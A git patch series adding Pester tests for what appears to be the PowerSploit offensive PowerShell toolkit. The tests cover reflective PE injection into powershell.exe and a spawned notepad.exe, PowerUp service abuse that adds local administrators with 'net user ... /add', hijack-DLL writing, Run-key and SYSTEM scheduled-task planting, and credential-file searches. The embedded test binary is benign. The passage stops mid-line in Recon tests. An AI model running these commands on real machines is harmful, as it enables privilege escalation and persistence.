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'
+
+	$WideStrDllBytes32 = [Convert]::FromBase64String($Encoded32BitWStringDll)
+	$StrDllBytes32 = [Convert]::FromBase64String($Encoded32BitStringDll)
+	$VoidDllBytes32 = [Convert]::FromBase64String($Encoded32BitVoidDll)
+	$WideStrDllBytes64 = [Convert]::FromBase64String($Encoded64BitWStringDll)
+	$StrDllBytes64 = [Convert]::FromBase64String($Encoded64BitStringDll)
+	$VoidDllBytes64 = [Convert]::FromBase64String($Encoded64BitVoidDll)
+	$ExeBytes32 = [Convert]::FromBase64String($Encoded32BitExe)
+	$ExeBytes64 = [Convert]::FromBase64String($Encoded64BitExe)
+
+	if ([IntPtr]::Size -eq 4) {
+		$PowerShell32bit = $True
+		$WideStrDllBytes = $WideStrDllBytes32
+		$StrDllBytes = $StrDllBytes32
+		$VoidDllBytes = $VoidDllBytes32
+		$ExeBytes = $ExeBytes32
+	} else {
+		$PowerShell32bit = $False
+		$WideStrDllBytes = $WideStrDllBytes64
+		$StrDllBytes = $StrDllBytes64
+		$VoidDllBytes = $VoidDllBytes64
+		$ExeBytes = $ExeBytes64
+	}
+
+	Context 'DLL loading' {
+		It 'should load a DLL (wchar_t*) in memory within powershell.exe and returns "Hello, world!"' {
+			$Result = Invoke-ReflectivePEInjection -PEBytes $WideStrDllBytes -FuncReturnType WString -DoNotZeroMZ
+
+			$Result | Should Not BeNullOrEmpty
+			$Result | Should Be 'Hello, world!'
+		}
+
+		It 'should load a DLL (char*) in memory within powershell.exe and returns "Hello, world!"' {
+			$Result = Invoke-ReflectivePEInjection -PEBytes $StrDllBytes -FuncReturnType String -DoNotZeroMZ
+
+			$Result | Should Not BeNullOrEmpty
+			$Result | Should Be 'Hello, world!'
+		}
+
+		It 'should load a DLL (void) in memory within powershell.exe and writes "Hello, world!" to %TEMP%\testoutput.txt' {
+			$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'
+			if (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }
+
+			Invoke-ReflectivePEInjection -PEBytes $VoidDllBytes -FuncReturnType Void -DoNotZeroMZ
+
+			Start-Sleep -Seconds 2
+			$TestOutputPath | Should Exist
+			$Result = Get-Content $TestOutputPath
+
+			$Result | Should Not BeNullOrEmpty
+			$Result | Should Be 'Hello, world!'
+		}
+
+		It 'should load a DLL (void) in memory within notepad.exe and write "Hello, world!" to %TEMP%\testoutput.txt' {
+			$64BitOS = $False
+			if ($Env:ProgramW6432) { $64BitOS = $True }
+
+			# When launching notepad.exe, the bitness of the process needs to match that of powershell.exe
+			if ($PowerShell32bit -and $64BitOS) {
+				# 32-bit PowerShell on a 64-bit OS needs to launch Wow64 notepad
+				$NotepadPath = "$($Env:SystemRoot)\SysWow64\notepad.exe"
+			} else {
+				$NotepadPath = "$($Env:SystemRoot)\System32\notepad.exe"
+			}
+
+			$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath
+
+			if ($NotepadProc.ReturnValue -ne 0) {
+				throw 'Could not start victim process: notepad.exe'
+			} 
+
+			$VictimPID = $NotepadProc.ProcessId
+
+			$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'
+			if (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }
+
+			Invoke-ReflectivePEInjection -PEBytes $VoidDllBytes -ProcId $VictimPID -DoNotZeroMZ
+
+			$Result = Get-Content $TestOutputPath
+
+			Start-Sleep -Seconds 2
+
+			Stop-Process -Id $VictimPID
+
+			$Result | Should Not BeNullOrEmpty
+			$Result | Should Be 'Hello, world!'
+		}
+
+		It 'should not load a DLL in memory within powershell.exe when the bitness of powershell.exe and the DLL do not match.' {
+			if ($PowerShell32bit) {
+				$PEBytes = $WideStrDllBytes64
+			} else {
+				$PEBytes = $WideStrDllBytes32
+			}
+
+			# Attempt to load the wide string DLL in memory with a mismatched bitness
+			{ Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -DoNotZeroMZ } | Should Throw
+		}
+
+		It 'should not load a DLL in memory within powershell.exe when the return types do not match.' {
+			# This DLL exports WStringFunc which means that -FunReturnType should be WString
+			{ $Result = Invoke-ReflectivePEInjection -PEBytes $WideStrDllBytes -FuncReturnType String -DoNotZeroMZ } | Should Throw
+		}
+	}
+
+	Context 'EXE Loading' {
+		$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'
+
+		BeforeEach {
+			if (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }
+		}
+
+		It 'should load an EXE in memory within powershell.exe and write "Hello, world!" to %TEMP%\testoutput.txt when provided no arguments' {
+			Invoke-ReflectivePEInjection -PEBytes $ExeBytes -DoNotZeroMZ
+		}
+
+		It 'should load an EXE in memory within powershell.exe and write "Hello, world!" to %TEMP%\testoutput.txt when provided arguments' {
+			Invoke-ReflectivePEInjection -PEBytes $ExeBytes -ExeArgs 'foo bar' -DoNotZeroMZ
+		}
+
+		AfterEach {
+			Start-Sleep -Seconds 2
+			$TestOutputPath | Should Exist
+			$Result = Get-Content $TestOutputPath
+
+			$Result | Should Not BeNullOrEmpty
+			$Result.StartsWith('Hello, world!') | Should Be $True
+		}
+	}
+}
\ No newline at end of file
-- 
cgit v1.2.3


From c143dc68859a0dbee91ad61d209b4ea918ad12f8 Mon Sep 17 00:00:00 2001
From: Harmj0y <will@harmj0y.net>
Date: Thu, 3 Dec 2015 21:57:26 -0500
Subject: Privesc/PowerUp Pester tests

---
 Tests/Privesc.tests.ps1 | 485 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 485 insertions(+)
 create mode 100644 Tests/Privesc.tests.ps1

(limited to 'Tests')

diff --git a/Tests/Privesc.tests.ps1 b/Tests/Privesc.tests.ps1
new file mode 100644
index 0000000..d1461d5
--- /dev/null
+++ b/Tests/Privesc.tests.ps1
@@ -0,0 +1,485 @@
+Set-StrictMode -Version Latest
+
+$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
+$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
+
+$ModuleManifest = "$ModuleRoot\Privesc\Privesc.psd1"
+Remove-Module [P]rivesc
+Import-Module $ModuleManifest -Force -ErrorAction Stop
+
+# import PowerUp.ps1 manually so we expose the helper functions for testing
+$PowerUpFile = "$ModuleRoot\Privesc\PowerUp.ps1"
+Import-Module $PowerUpFile -Force -ErrorAction Stop
+
+
+
+function Get-RandomName {
+    $r = 1..8 | ForEach-Object{Get-Random -max 26}
+    return ('abcdefghijklmnopqrstuvwxyz'[$r] -join '')
+}
+
+
+########################################################
+#
+# PowerUp helpers functions.
+#
+########################################################
+
+Describe 'Get-ModifiableFile' {
+
+    It 'Should output a file path.' {
+        $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
+        $Null | Out-File -FilePath $FilePath -Force
+
+        $Output = Get-ModifiableFile -Path $FilePath
+        $Output | Should Be $FilePath
+
+        Remove-Item -Path $FilePath -Force
+    }
+
+    It 'Should extract a modifiable file specified as an argument in a command string.' {
+        $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
+        $Null | Out-File -FilePath $FilePath -Force
+
+        $CmdPath = "'C:\Windows\System32\nonexistent.exe' -i '$FilePath'"
+        
+        $Output = Get-ModifiableFile -Path $FilePath
+        $Output | Should Be $FilePath
+
+        Remove-Item -Path $FilePath -Force
+    }
+
+    It 'Should return no results for a non-existent path.' {
+        $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
+
+        $Output = Get-ModifiableFile -Path $FilePath
+        $Output | Should BeNullOrEmpty
+    }
+
+    It 'Should accept a Path over the pipeline.' {
+        $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
+
+        $Output = Get-ModifiableFile -Path $FilePath
+        $Output | Should BeNullOrEmpty
+    }
+}
+
+
+########################################################
+#
+# PowerUp service enumeration functions.
+#
+########################################################
+
+Describe 'Get-ServiceUnquoted' {
+
+    It "Should not throw." {
+        {Get-ServiceUnquoted} | Should Not Throw
+    }
+
+    It 'Should return service with a space in an unquoted binPath.' {
+        $ServiceName = Get-RandomName
+        $ServicePath = "C:\Program Files\service.exe"
+
+        sc.exe create $ServiceName binPath= $ServicePath | Should Match "SUCCESS"
+        Start-Sleep -Seconds 1
+
+        $Output = Get-ServiceUnquoted | Where-Object { $_.ServiceName -eq $ServiceName }
+        sc.exe delete $ServiceName | Should Match "SUCCESS"
+
+        $Output | Should Not BeNullOrEmpty
+        $Output.ServiceName | Should Be $ServiceName
+        $Output.Path | Should Be $ServicePath
+    }
+
+    It 'Should not return services with a quoted binPath.' {
+        $ServiceName = Get-RandomName
+        $ServicePath = "'C:\Program Files\service.exe'"
+
+        sc.exe create $ServiceName binPath= $ServicePath | Should Match "SUCCESS"
+        Start-Sleep -Seconds 1
+
+        $Output = Get-ServiceUnquoted | Where-Object { $_.ServiceName -eq $ServiceName }
+        sc.exe delete $ServiceName | Should Match "SUCCESS"
+
+        $Output | Should BeNullOrEmpty
+    }
+}
+
+
+Describe 'Get-ServiceFilePermission' {
+
+    It 'Should not throw.' {
+        {Get-ServiceFilePermission} | Should Not Throw
+    }
+
+    It 'Should return a service with a modifiable service binary.' {
+        $ServiceName = Get-RandomName
+        $ServicePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" + ".exe"
+        $Null | Out-File -FilePath $ServicePath -Force
+
+        sc.exe create $ServiceName binPath= $ServicePath | Should Match "SUCCESS"
+
+        $Output = Get-ServiceFilePermission | Where-Object { $_.ServiceName -eq $ServiceName }
+        sc.exe delete $ServiceName | Should Match "SUCCESS"
+        Remove-Item -Path $ServicePath -Force
+
+        $Output | Should Not BeNullOrEmpty
+        $Output.ServiceName | Should Be $ServiceName
+        $Output.Path | Should Be $ServicePath
+    }
+
+    It 'Should not return a service with a non-existent service binary.' {
+        $ServiceName = Get-RandomName
+        $ServicePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" + ".exe"
+
+        sc.exe create $ServiceName binPath= $ServicePath | Should Match "SUCCESS"
+
+        $Output = Get-ServiceFilePermission | Where-Object { $_.ServiceName -eq $ServiceName }
+        sc.exe delete $ServiceName | Should Match "SUCCESS"
+
+        $Output | Should BeNullOrEmpty        
+    }
+}
+
+
+Describe 'Get-ServicePermission' {
+
+    It 'Should not throw.' {
+        {Get-ServicePermission} | Should Not Throw
+    }
+
+    It 'Should return a modifiable service.' {
+        $Output = Get-ServicePermission | Where-Object { $_.ServiceName -eq 'Dhcp'}
+        $Output | Should Not BeNullOrEmpty
+    }
+}
+
+
+Describe 'Get-ServiceDetail' {
+
+    It 'Should return results for a valid service.' {
+        $Output = Get-ServiceDetail -ServiceName Dhcp
+        $Output | Should Not BeNullOrEmpty
+    }
+
+    It 'Should return not results for an invalid service.' {
+        $Output = Get-ServiceDetail -ServiceName NonExistent123
+        $Output | Should BeNullOrEmpty
+    }
+}
+
+
+
+########################################################
+#
+# PowerUp service abuse functions.
+#
+########################################################
+
+Describe 'Invoke-ServiceAbuse' {
+    
+    BeforeEach {
+        $ServicePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" + ".exe"
+        $Null = sc.exe create "PowerUpService" binPath= $ServicePath
+    }
+
+    AfterEach {
+        $Null = sc.exe delete "PowerUpService"
+        $Null = $(net user john /delete >$Null 2>&1)
+    }
+
+    It 'Should abuse a vulnerable service to add a local administrator with default options.' {
+        $Output = Invoke-ServiceAbuse -ServiceName "PowerUpService"
+        $Output.Command | Should Match "net"
+
+        if( -not ($(net localgroup Administrators) -match "john")) {
+            Throw "Local user 'john' not created."
+        }
+    }
+
+    It 'Should accept a service name on the pipeline.' {
+        $Output = "PowerUpService" | Invoke-ServiceAbuse
+        $Output.Command | Should Match "net"
+
+        if( -not ($(net localgroup Administrators) -match "john")) {
+            Throw "Local user 'john' not created."
+        }
+    }
+
+    It 'User should not be created for a non-existent service.' {
+        $Output = Invoke-ServiceAbuse -ServiceName "NonExistentService456"
+        $Output.Command | Should Match "Not found"
+
+        if( ($(net localgroup Administrators) -match "john")) {
+            Throw "Local user 'john' should not have been created for non-existent service."
+        }
+    }
+
+    It 'Should accept custom user/password arguments.' {
+        $Output = Invoke-ServiceAbuse -ServiceName "PowerUpService" -Username PowerUp -Password 'PASSword123!'
+        $Output.Command | Should Match "net"
+
+        if( -not ($(net localgroup Administrators) -match "PowerUp")) {
+            Throw "Local user 'PowerUp' not created."
+        }
+        $Null = $(net user PowerUp /delete >$Null 2>&1)
+    }
+
+    It 'Should accept a custom command.' {
+        $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
+        $Output = Invoke-ServiceAbuse -ServiceName "PowerUpService" -Command "net user testing Password123! /add"
+
+        if( -not ($(net user) -match "testing")) {
+            Throw "Custom command failed."
+        }
+        $Null = $(net user testing /delete >$Null 2>&1)
+    }
+}
+
+
+Describe 'Install-ServiceBinary' {
+
+    BeforeEach {
+        $ServicePath = "$(Get-Location)\powerup.exe"
+        $Null | Out-File -FilePath $ServicePath -Force
+        $Null = sc.exe create "PowerUpService" binPath= $ServicePath
+    }
+
+    AfterEach {
+        $Null = Invoke-ServiceStop -ServiceName PowerUpService
+        $Null = sc.exe delete "PowerUpService"
+        $Null = $(net user john /delete >$Null 2>&1)
+        if(Test-Path "$(Get-Location)\powerup.exe") {
+            Remove-Item -Path "$(Get-Location)\powerup.exe" -Force
+        }
+        if(Test-Path "$(Get-Location)\powerup.exe.bak") {
+            Remove-Item -Path "$(Get-Location)\powerup.exe.bak" -Force
+        }
+    }
+
+    It 'Should abuse a vulnerable service binary to add a local administrator with default options.' {
+
+        $Output = Install-ServiceBinary -ServiceName "PowerUpService"
+        $Output.Command | Should Match "net"
+
+        $Null = Invoke-ServiceStart -ServiceName PowerUpService
+        Start-Sleep -Seconds 3
+        if( -not ($(net localgroup Administrators) -match "john")) {
+            Throw "Local user 'john' not created."
+        }
+        $Null = Invoke-ServiceStop -ServiceName PowerUpService
+
+        $Output = Restore-ServiceBinary -ServiceName PowerUpService
+        "$(Get-Location)\powerup.exe.bak" | Should Not Exist
+    }
+
+    It 'Should accept a service name on the pipeline.' {
+
+        $Output = "PowerUpService" | Install-ServiceBinary
+        $Output.Command | Should Match "net"
+
+        $Null = Invoke-ServiceStart -ServiceName PowerUpService
+        Start-Sleep -Seconds 3
+        if( -not ($(net localgroup Administrators) -match "john")) {
+            Throw "Local user 'john' not created."
+        }
+        $Null = Invoke-ServiceStop -ServiceName PowerUpService
+
+        $Output = Restore-ServiceBinary -ServiceName PowerUpService
+        "$(Get-Location)\powerup.exe.bak" | Should Not Exist
+    }
+
+    It 'User should not be created for a non-existent service.' {
+        $Output = Install-ServiceBinary -ServiceName "NonExistentService456"
+        $Output.Command | Should Match "Not found"
+    }
+
+    It 'Should accept custom user/password arguments.' {
+        $Output = Install-ServiceBinary -ServiceName "PowerUpService" -Username PowerUp -Password 'PASSword123!'
+        $Output.Command | Should Match "net"
+
+        $Null = Invoke-ServiceStart -ServiceName PowerUpService
+        Start-Sleep -Seconds 3
+        if( -not ($(net localgroup Administrators) -match "PowerUp")) {
+            Throw "Local user 'PowerUp' not created."
+        }
+        $Null = $(net user PowerUp /delete >$Null 2>&1)
+
+        $Output = Restore-ServiceBinary -ServiceName PowerUpService
+        "$(Get-Location)\powerup.exe.bak" | Should Not Exist
+    }
+
+    It 'Should accept a custom command.' {
+
+        $Output = Install-ServiceBinary -ServiceName "PowerUpService" -Command "net user testing Password123! /add"
+        $Output.Command | Should Match "net"
+
+        $Null = Invoke-ServiceStart -ServiceName PowerUpService
+        Start-Sleep -Seconds 3
+        if( -not ($(net user) -match "testing")) {
+            Throw "Custom command failed."
+        }
+        $Null = $(net user testing /delete >$Null 2>&1)
+
+        $Output = Restore-ServiceBinary -ServiceName PowerUpService
+        "$(Get-Location)\powerup.exe.bak" | Should Not Exist
+    }
+}
+
+
+########################################################
+#
+# PowerUp .dll hijacking functions.
+#
+########################################################
+
+Describe 'Find-DLLHijack' {
+    It 'Should return results.' {
+        $Output = Find-DLLHijack
+        $Output | Should Not BeNullOrEmpty
+    }
+}
+
+
+Describe 'Find-PathHijack' {
+
+    It 'Should find a hijackable %PATH% folder.' {
+
+        New-Item -Path C:\PowerUpTest\ -ItemType directory -Force
+
+        $OldPath = $Env:PATH
+        $Env:PATH += ';C:\PowerUpTest\'
+
+        $Output = Find-PathHijack | Where-Object {$_.HijackablePath -like "*PowerUpTest*"}
+        $Env:PATH = $OldPath
+        $Output.HijackablePath | Should Be 'C:\PowerUpTest\'
+    }
+}
+
+# won't actually execute on Win8+ with the wlbsctrl.dll method
+Describe 'Write-HijackDll' {
+
+    It 'Should write a .dll that executes a custom command.' {
+
+        Write-HijackDll -OutputFile "$(Get-Location)\powerup.dll" -Command "net user testing Password123! /add"
+        
+        "$(Get-Location)\powerup.dll" | Should Exist
+        "$(Get-Location)\debug.bat" | Should Exist
+        Remove-Item -Path "$(Get-Location)\powerup.dll" -Force
+        Remove-Item -Path "$(Get-Location)\debug.bat" -Force
+    }
+}
+
+
+########################################################
+#
+# PowerUp registry checks.
+#
+########################################################
+
+Describe 'Get-RegAlwaysInstallElevated' {
+    It 'Should not throw.' {
+        {Get-ServicePermission} | Should Not Throw
+    }
+}
+
+
+Describe 'Get-RegAutoLogon' {
+    It 'Should not throw.' {
+        {Get-ServicePermission} | Should Not Throw
+    }
+}
+
+
+Describe 'Get-VulnAutoRun' {
+    It 'Should not throw.' {
+        {Get-VulnAutoRun} | Should Not Throw
+    }
+    It 'Should find a vulnerable autorun.' {
+        $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
+        $Null | Out-File -FilePath $FilePath -Force
+        Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name PowerUp -Value "vuln.exe -i '$FilePath'"
+
+        $Output = Get-VulnAutoRun | ?{$_.Path -like "*$FilePath*"}
+
+        Remove-Item -Path $FilePath -Force
+        $Null = Remove-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name PowerUp
+        
+        $Output.ModifiableFile | Should Be $FilePath
+    }    
+}
+
+
+########################################################
+#
+# PowerUp misc. checks.
+#
+########################################################
+
+Describe 'Get-VulnSchTask' {
+    It 'Should not throw.' {
+        {Get-VulnSchTask} | Should Not Throw
+    }
+
+    It 'Should find a vulnerable config file for a binary specified in a schtask.' {
+
+        $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())"
+        $Null | Out-File -FilePath $FilePath -Force
+
+        $Null = schtasks.exe /create /tn PowerUp /tr "vuln.exe -i '$FilePath'" /sc onstart /ru System /f
+
+        $Output = Get-VulnSchTask | Where-Object {$_.TaskName -eq 'PowerUp'}
+        $Null = schtasks.exe /delete /tn PowerUp /f
+        Remove-Item -Path $FilePath -Force
+
+        $Output.TaskFilePath | Should Be $FilePath
+    }
+}
+
+
+Describe 'Get-UnattendedInstallFile' {
+    It 'Should not throw.' {
+        {Get-UnattendedInstallFile} | Should Not Throw
+    }
+    It 'Should return a leftover autorun' {
+        $FilePath = Join-Path $Env:WinDir "\System32\Sysprep\unattend.xml"
+
+        $Null | Out-File -FilePath $FilePath -Force
+        $Output = Get-UnattendedInstallFile
+        $Output | Should Not BeNullOrEmpty
+
+        Remove-Item -Path $FilePath -Force
+    }
+}
+
+
+Describe 'Get-Webconfig' {
+    It 'Should not throw.' {
+        {Get-Webconfig} | Should Not Throw
+    }
+}
+
+
+Describe 'Get-ApplicationHost' {
+    It 'Should not throw.' {
+        {Get-ApplicationHost} | Should Not Throw
+    }
+}
+
+
+Describe 'Invoke-AllChecks' {
+    It 'Should return results to stdout.' {
+        $Output = Invoke-AllChecks
+        $Output | Should Not BeNullOrEmpty
+    }
+    It 'Should produce a HTML report with -HTMLReport.' {
+        $Output = Invoke-AllChecks -HTMLReport
+        $Output | Should Not BeNullOrEmpty
+
+        $HtmlReportFile = "$($Env:ComputerName).$($Env:UserName).html"
+
+        $HtmlReportFile | Should Exist
+        Remove-Item -Path $HtmlReportFile -Force
+    }
+}
-- 
cgit v1.2.3


From e44df184a89c7394444336917068c2a12e18aeb6 Mon Sep 17 00:00:00 2001
From: Harmj0y <will@harmj0y.net>
Date: Thu, 3 Dec 2015 21:57:41 -0500
Subject: Start of Recon/PowerView Pester tests

---
 Tests/Recon.tests.ps1 | 676 ++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 676 insertions(+)
 create mode 100644 Tests/Recon.tests.ps1

(limited to 'Tests')

diff --git a/Tests/Recon.tests.ps1 b/Tests/Recon.tests.ps1
new file mode 100644
index 0000000..a1d539d
--- /dev/null
+++ b/Tests/Recon.tests.ps1
@@ -0,0 +1,676 @@
+
+$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
+$ModuleRoot = Resolve-Path "$TestScriptRoot\.."
+$ModuleManifest = "$ModuleRoot\Recon\Recon.psd1"
+
+Remove-Module [R]econ
+Import-Module $ModuleManifest -Force -ErrorAction Stop
+
+# import PowerView.ps1 manually so we expose the helper functions for testing
+$PowerViewFile = "$ModuleRoot\Recon\PowerView.ps1"
+Import-Module $PowerViewFile -Force -ErrorAction Stop
+
+
+# Get the local IP address for later testing
+$IPregex = "(?<Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"
